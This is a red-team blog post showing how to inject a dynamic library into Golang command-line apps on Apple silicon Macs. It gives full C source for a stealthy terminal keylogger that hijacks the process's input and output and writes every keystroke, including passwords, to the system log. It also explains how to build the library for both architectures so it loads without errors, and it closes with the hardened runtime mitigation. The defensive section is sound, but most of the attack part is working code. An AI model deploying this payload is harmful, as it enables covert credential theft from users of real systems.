DYLIB Injection in Golang apps on Apple silicon chips

blogs· 8min

July 22, 2022

Creating persistence is one of the biggest challenges during Red Team engagements, and doing it in a stealthy yet reliable way is even more difficult. One old technique on Unix-based systems is library injection through environment variables. In this post, we will look at whether this is still possible on macOS 10.14 (Mojave) and later.

Overview

On Linux systems one can inject shared objects into a process by specifying the LD_PRELOAD environment variable, while on macOS the equivalent is the DYLD_INSERT_LIBRARIES variable. Both of them allow the user (or the attacker) to specify a .so or .dylib file that will get loaded into a process upon execution. This effectively allows code injection and access to application internals such as process memory and control flow. It can be a powerful technique for developers debugging their applications but also for attackers creating backdoors on a system.
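Because the mechanism is just an environment variable, a program can also look for it at startup. The following is a minimal sketch of such a check, not something the original tooling does; the function name count_preloaded_libraries is hypothetical, and the code assumes the colon-separated list format that DYLD_INSERT_LIBRARIES uses.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: count the libraries named in a colon-separated
 * preload variable such as DYLD_INSERT_LIBRARIES.
 * Returns 0 when the variable is unset or empty. */
int count_preloaded_libraries(const char *var_name)
{
    const char *value = getenv(var_name);
    if (value == NULL || *value == '\0')
        return 0;

    int count = 0;
    const char *p = value;
    while (*p != '\0') {
        size_t len = strcspn(p, ":");   /* length of the next entry */
        if (len > 0)
            count++;                    /* ignore empty entries such as "a::b" */
        p += len;
        if (*p == ':')
            p++;                        /* step over the separator */
    }
    return count;
}
```

A non-zero result for "DYLD_INSERT_LIBRARIES" only tells the program that something asked for a library to be inserted; it says nothing about whether the loader honored the request.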

We carry out our Red Team engagements in an environment with a large number of clients running macOS and custom Golang applications, and wanted to test whether DYLIB injection is still feasible now that Apple has introduced System Integrity Protection (SIP, in OS X 10.11 El Capitan) and the Hardened Runtime (in macOS 10.14 Mojave).

In this article we will cover:

  • testing DYLIB injection on Golang apps on an M1 Mac
  • creating an effective payload for terminal keylogging on macOS
  • facing the challenges of multiarch support via Rosetta
  • mitigating DYLIB injection in Golang apps by using hardened runtime

Dylib injection in Golang apps

The good news (and also the bad news) is that DYLIB injection in Golang apps just works. Since Golang compiles to native machine code, it is just as vulnerable to DYLIB injection as any application built in C, for example. To test this we can create a small Golang application:

password.go

package main

import (
    "fmt"
)

func main() {
    fmt.Println("Enter password: ")
    text2 := ""
    fmt.Scanln(&text2)
    fmt.Println("Welcome!")
}

Build it with:

% go build password.go

Now let's build a library we can inject. We are going to code this one in C, for the sake of expanding it later into a proper payload:

payload.c

#include <stdio.h>

__attribute__((constructor))
static void customConstructor(int argc, const char **argv)
{
  printf("DYLIB injection successful!\n");
}

Build it with:

% gcc -dynamiclib payload.c -o payload.dylib

Now export the library path:

% export DYLD_INSERT_LIBRARIES=$PWD/payload.dylib

And finally execute the password application:

% ./password
DYLIB injection successful!
Enter password:

From the output we can see that the library code executed alongside the original binary: the DYLIB injection was successful.
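The reason the message appears before the password prompt is the constructor attribute: the loader runs such functions once the image is loaded and before main starts. A minimal sketch of that ordering, with the hypothetical names constructor_ran and loaded_before_main introduced only for illustration:

```c
/* Set by the constructor so the rest of the program can see that it ran. */
int constructor_ran = 0;

/* The dynamic loader calls constructor functions after the image is
 * loaded and before main() starts, without the host program asking. */
__attribute__((constructor))
static void on_load(void)
{
    constructor_ran = 1;
}

/* Hypothetical helper: report whether on_load() has already executed. */
int loaded_before_main(void)
{
    return constructor_ran;
}
```

Calling loaded_before_main() as the first statement of main returns 1, which is the same ordering that lets the injected library act before the Go program prints its prompt.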

Creating a terminal keylogger payload

Injecting a library is quite easy, as we can see; creating a useful payload, however, is usually not as straightforward. While we could of course execute anything by creating a new thread, with library injection what we are usually after is access to the data handled by the process itself.

We could reverse engineer the application and attempt to tamper with its memory, but with most console applications (CLIs, for example) the sensitive data is in the user input. For this purpose we created a sort of man-in-the-middle payload that uses standard system functions to manipulate the terminal and capture input and output.

Challenge 1: peeking stdin

The first solution that comes to mind is to create a new thread that reads all the input from stdin. While this sounds simple enough, after hours of research and trial and error we found that it is not actually possible. stdin is a file descriptor, but it is not seekable: whatever one thread reads is consumed, so we cannot monitor it with one thread and keep using it with another at the same time. Using getc and trying to push characters back onto the stream results in race conditions, with some characters getting missed.

While it is not possible to manipulate the file descriptor the way we want, nothing is stopping us from creating a new one. Fortunately there is a library function just for this called openpty (declared in util.h on macOS). It is usually used for running console applications in a virtual terminal; here we use it to create a virtual terminal and hijack both the input and the output of the process. The idea is to hand the virtual stdin, stdout and stderr to the original process by overwriting the STDIN_FILENO, STDOUT_FILENO and STDERR_FILENO descriptors using dup2. With this we are essentially cutting the application off from the actual user input and output, and making it run in a fake terminal.

    int master;
    int slave;
    openpty(&master, &slave, NULL, &current, NULL);
    
    dup2(slave, STDIN_FILENO);
    dup2(slave, STDOUT_FILENO);
    dup2(slave, STDERR_FILENO);

We will also create a set of new file descriptors to the calling terminal, allowing us to communicate with the user:

    oldstdin = fileno(fopen("/dev/tty", "r"));
    oldstdout = fileno(fopen("/dev/tty", "a"));
    oldstderr = oldstdout;
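The descriptor swap itself is easy to try in isolation. The sketch below is not the payload: it assumes a plain pipe instead of a pseudo-terminal and keeps the original descriptor with dup instead of reopening /dev/tty, purely to show how dup2 repoints a standard descriptor and how it can be restored. The function name capture_stdout_write is hypothetical.

```c
#include <stdio.h>
#include <unistd.h>

/* Hypothetical helper: point STDOUT_FILENO at a pipe, send one write
 * through it, restore the real stdout, then read back what was captured.
 * Returns the number of bytes captured into out, or -1 on error.
 * Keep msg smaller than the pipe buffer, otherwise write() would block. */
ssize_t capture_stdout_write(const char *msg, size_t len,
                             char *out, size_t out_size)
{
    int fds[2];
    if (pipe(fds) < 0)
        return -1;

    fflush(stdout);                    /* keep buffered stdio data out of the pipe */
    int saved = dup(STDOUT_FILENO);    /* handle on the real stdout */
    if (saved < 0 || dup2(fds[1], STDOUT_FILENO) < 0) {
        if (saved >= 0)
            close(saved);
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    close(fds[1]);                     /* fd 1 now refers to the pipe's write end */

    ssize_t written = write(STDOUT_FILENO, msg, len);  /* lands in the pipe */

    dup2(saved, STDOUT_FILENO);        /* restore; this also closes the pipe's write end */
    close(saved);

    ssize_t n = -1;
    if (written >= 0)
        n = read(fds[0], out, out_size);
    close(fds[0]);
    return n;
}
```

Code that writes to descriptor 1 cannot tell the difference, which is the property the virtual terminal relies on.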

The next step is to create a bridge between the virtual and the real terminal. We will forward all user input from the real stdin to the virtual and do the same for output in the other direction. We will also copy and log everything along the way of course :)

  fd_set rfds;
  struct timeval tv;
  char buf[4097];
  ssize_t size;

  /* real terminal -> virtual terminal (and the log) */
  FD_ZERO(&rfds);
  FD_SET(oldstdin, &rfds);
  tv.tv_sec = 0;   /* zero timeout: poll without blocking */
  tv.tv_usec = 0;
  if (select(oldstdin + 1, &rfds, NULL, NULL, &tv) > 0) {
    size = read(oldstdin, buf, 4096);
    if (size > 0) {   /* read returns -1 on error, 0 on EOF */
      buf[size] = '\0';
      syslog(LOG_ERR, "Data:%s\n", buf);
      write(master, buf, size);
    }
  }

  /* virtual terminal -> real terminal */
  FD_ZERO(&rfds);
  FD_SET(master, &rfds);
  if (select(master + 1, &rfds, NULL, NULL, &tv) > 0) {
    size = read(master, buf, 4096);
    if (size > 0)
      write(oldstdout, buf, size);
  }

Here we use select with a zero timeout to check whether each file descriptor has data ready, so that a read in one direction never blocks the other.
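The same forwarding step can be written as a small reusable function. This is a sketch under a few assumptions rather than the code used in the payload: the name forward_if_ready and the millisecond timeout parameter are hypothetical, and a short non-zero timeout is used so that a loop built on it does not spin at full CPU.

```c
#include <sys/select.h>
#include <unistd.h>

/* Hypothetical helper: wait up to timeout_ms for data on src and, if any
 * arrives, copy one chunk to dst.
 * Returns bytes forwarded, 0 on timeout or EOF, -1 on error. */
ssize_t forward_if_ready(int src, int dst, int timeout_ms)
{
    fd_set rfds;
    struct timeval tv;
    char buf[4096];

    FD_ZERO(&rfds);
    FD_SET(src, &rfds);
    /* select() may modify the timeout, so rebuild it on every call. */
    tv.tv_sec = timeout_ms / 1000;
    tv.tv_usec = (timeout_ms % 1000) * 1000;

    int ready = select(src + 1, &rfds, NULL, NULL, &tv);
    if (ready <= 0)
        return ready;                  /* 0: timeout, -1: error */

    ssize_t n = read(src, buf, sizeof buf);
    if (n <= 0)
        return n;                      /* 0: EOF, -1: error */

    /* write() can be partial, so loop until the whole chunk is out. */
    ssize_t off = 0;
    while (off < n) {
        ssize_t w = write(dst, buf + off, (size_t)(n - off));
        if (w <= 0)
            return -1;
        off += w;
    }
    return n;
}
```

Checking the return values of select and read matters here: indexing the buffer with a failed read's -1 would write outside the array.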

Challenge 2: raw input and other terminal settings

The solution above works well as long as the application doesn't do anything unusual with the terminal, for example changing the input mode to raw. The terminal has a set of options that control how user input and output behave. The termios functions allow developers to switch between line-buffered and raw input mode (the app receives input line by line or on every keypress), or to turn terminal echo on and off. These calls are usually hidden from developers by libraries such as ncurses, which also means that a lot of programs use them without us knowing. Trying this MiTM technique on the following example code will break user input entirely:

#include <stdio.h>
#include <termios.h>
#include <stdlib.h>

int main()
{

    char ch;

    struct termios current;
    int result;
    tcgetattr (0, &current);
    cfmakeraw(&current);
    tcsetattr (0, TCSANOW, &current);

    printf("Enter some text: ");
    for(int i = 0; i<20; i = i+1){
        scanf("%c", &ch);
        printf("%c", ch);
    }

    return 0;
}

The solution to this is fortunately quite simple. We have to monitor the virtual terminal for changes in the configuration and then apply them to the real terminal.

The following function copies the terminal attributes from one terminal to the other:

void terminalcopy(int old, int new){
    struct termios oldsettings;
    int result;
    result = tcgetattr (old, &oldsettings);
    if (result < 0)
    {
        syslog(LOG_ERR, "error in tcgetattr old");
    }
    result = tcsetattr (new, TCSANOW, &oldsettings);
    if (result < 0)
    {
        syslog(LOG_ERR, "error in tcsetattr");
    }
}

We can simply embed this into our input loop.
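Calling tcsetattr on every pass of the loop is simple but does redundant work. One possible refinement, sketched here as an assumption and not as part of the original payload, is to remember the last settings seen and apply them only when they change. The names termios_changed and sync_termios are hypothetical.

```c
#include <string.h>
#include <termios.h>

/* Return 1 if the two settings differ in any mode flag or control character. */
int termios_changed(const struct termios *a, const struct termios *b)
{
    return a->c_iflag != b->c_iflag ||
           a->c_oflag != b->c_oflag ||
           a->c_cflag != b->c_cflag ||
           a->c_lflag != b->c_lflag ||
           memcmp(a->c_cc, b->c_cc, sizeof a->c_cc) != 0;
}

/* Copy the settings of src to dst only when they differ from *last,
 * which caches the settings seen on the previous call.
 * Returns 1 if settings were applied, 0 if unchanged, -1 on error. */
int sync_termios(int src, int dst, struct termios *last)
{
    struct termios now;

    if (tcgetattr(src, &now) < 0)
        return -1;
    if (!termios_changed(&now, last))
        return 0;
    if (tcsetattr(dst, TCSANOW, &now) < 0)
        return -1;
    *last = now;
    return 1;
}
```

The cache would be initialised once with tcgetattr on the source terminal before the loop starts.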

Challenge 3: exfiltrating data

This isn't really a challenge with the injection; it is more a challenge with Red Teaming in general. Getting the stolen goods across the border, that is, writing logged passwords or API keys to a file, is usually a noisy process. In this payload we use a solution proposed by our team lead @Daniel Teixeira: we write all our data to the system log using the syslog function.

syslog(LOG_ERR, "Data:%s\n", buf);

This solution is practical when the engagement allows relatively easy access to log facilities. It could be further refined by encrypting the logged information.

Putting it all together

#include "spy.h"
#include <stdio.h>
#include <syslog.h>
#include <stdlib.h>
#include <pthread.h>
#include <sys/select.h>
#include <fcntl.h>
#include <util.h>
#include <unistd.h>
#include <termios.h>

int master;
int slave;
int oldstdin;
int oldstdout;
int oldstderr;

void terminalcopy(int old, int new){
    struct termios oldsettings;
    int result;
    
    result = tcgetattr (old, &oldsettings);
    if (result < 0)
    {
        syslog(LOG_ERR, "error in tcgetattr old");
    }
    result = tcsetattr (new, TCSANOW, &oldsettings);
    if (result < 0)
    {
        syslog(LOG_ERR, "error in tcsetattr");
    }
}

void* spyfunc(void *arg){
    (void)arg;   /* unused; required by the pthread start routine signature */

    syslog(LOG_ERR, "Spy thread started!\n");
    
    fd_set rfds;
    struct timeval tv;
    tv.tv_sec = 0;
    tv.tv_usec = 0;
    char buf[4097];
    ssize_t size;
    
    while(1)
    {
        /* mirror mode changes made by the app onto the real terminal */
        terminalcopy(slave, oldstdin);

        FD_ZERO(&rfds);
        FD_SET(oldstdin, &rfds);
        if (select(oldstdin + 1, &rfds, NULL, NULL, &tv) > 0) {
            size = read(oldstdin, buf, 4096);
            if (size > 0) {   /* read returns -1 on error, 0 on EOF */
                buf[size] = '\0';
                syslog(LOG_ERR, "Data:%s\n", buf);
                write(master, buf, size);
            }
        }
        
        FD_ZERO(&rfds);
        FD_SET(master, &rfds);
        if (select(master + 1, &rfds, NULL, NULL, &tv) > 0) {
            size = read(master, buf, 4096);
            if (size > 0)
                write(oldstdout, buf, size);
        }
        
    }
    return NULL;
}

__attribute__((constructor))
static void customConstructor(int argc, const char **argv)
{
    struct termios current;
    int result;
    result = tcgetattr (STDIN_FILENO, &current);
    
    openpty(&master, &slave, NULL, &current, NULL);
    
    dup2(slave, STDIN_FILENO);
    dup2(slave, STDOUT_FILENO);
    dup2(slave, STDERR_FILENO);
    oldstdin = fileno(fopen("/dev/tty", "r"));
    oldstdout = fileno(fopen("/dev/tty", "a"));
    oldstderr = oldstdout;
    
    pthread_t id;
    
    pthread_create(&id, NULL, spyfunc, NULL);
    
    syslog(LOG_ERR, "Dylib injection successful in %s\n", argv[0]);
}

This code still has some limitations: it will fail when the application manipulates /dev/tty directly. For most console applications, however, it works as expected.

Multiarch issues

We are testing this on a relatively new M1 MacBook, which runs both native ARM and x64 binaries. If we simply compile our library, the result is a native ARM binary; if we then try to inject it into an x64 process running under Rosetta, we get the following error message:

dyld[31453]: terminating because inserted dylib '/$PATH/spy.dylib' could not be loaded: tried: '/$PATH/spy.dylib' (mach-o file, but is an incompatible architecture (have 'arm64e', need 'x86_64')), '/usr/local/lib/spy.dylib' (no such file), '/usr/lib/spy.dylib' (no such file)

From a Red Team perspective this is an issue, since we cannot be sure what kind of process our library will be injected into, and the error can tip off the user that something is not right on the system. To solve this we have to compile our library with multiarch support.

To achieve this we open Xcode, load our code, select the project, select Build Settings and set release to ARCHS = $(ARCHS_STANDARD) (Standard Architectures (Apple Silicon, Intel)). Hit build; the resulting dylib file will be under $home/Library/Developer/Xcode/DerivedData/$projectname/Build/Products/Debug/. The result is a single dylib that contains code for both architectures.

Using this library it is possible to inject into both native ARM processes and x64 processes running under Rosetta.
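A quick way to confirm that a build really contains both architectures is lipo -info. The same check can be sketched in C by reading the universal ("fat") header at the start of the file. The function name fat_has_arch and the ARCH_ constants below are hypothetical names; the numeric values mirror the Mach-O definitions, and the sketch only handles the 32-bit fat header layout.

```c
#include <stddef.h>
#include <stdint.h>

#define FAT_MAGIC_VALUE 0xcafebabeu   /* universal binary magic, stored big-endian */
#define ARCH_X86_64     0x01000007u   /* CPU_TYPE_X86 (7) | CPU_ARCH_ABI64 */
#define ARCH_ARM64      0x0100000cu   /* CPU_TYPE_ARM (12) | CPU_ARCH_ABI64 */

/* Fat headers are always big-endian, whatever the host byte order is. */
static uint32_t read_be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Return 1 if the fat header in buf lists cputype, 0 if it does not,
 * and -1 if buf does not start with a fat header or is truncated. */
int fat_has_arch(const unsigned char *buf, size_t len, uint32_t cputype)
{
    if (len < 8 || read_be32(buf) != FAT_MAGIC_VALUE)
        return -1;

    uint32_t count = read_be32(buf + 4);
    /* Each entry is five 32-bit fields:
     * cputype, cpusubtype, offset, size, align. */
    if (count > (len - 8) / 20)
        return -1;

    for (uint32_t i = 0; i < count; i++) {
        if (read_be32(buf + 8 + (size_t)i * 20) == cputype)
            return 1;
    }
    return 0;
}
```

A library built for a single architecture starts with a thin Mach-O header instead, so the function returns -1 for it. Note that arm64 and arm64e share the same CPU type and differ only in the subtype, which this sketch does not inspect.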

Protecting against all of this

Apple introduced the Hardened Runtime in macOS 10.14 (Mojave), which in theory should prevent attacks like this. The catch is that it is opt-in: developers have to sign their applications with the hardened runtime option enabled for it to take effect when their code executes.

To test this we can create a self signed certificate in Keychain Access. Then use this certificate to sign our example Go app.

Let's build our Go example from before, and test DYLIB injection again:

% export DYLD_INSERT_LIBRARIES=/osx_injections/spy0.dylib
% go build readline.go
% ./readline
DYLIB injection successful!
Enter password:
asdasd
Welcome!

Now let's sign our app with a self signed certificate and hardened runtime enabled:

% sudo codesign -fs certname -o runtime readline
readline: replacing existing signature
% ./readline
Enter password:
asdasd
Welcome!

As we can see, the library is no longer loaded: with the hardened runtime enabled, the application is, among other things, immune to DYLIB injection.

Conclusion

While macOS has some great security features, we as developers have to be mindful that these features sometimes have to be explicitly enabled. DYLIB injection is usually only exploitable when the attackers already have access to the target system, but in the name of defense in depth these issues should be mitigated whenever possible.

by Marcell Molnár Ethical Hacker at FORM3
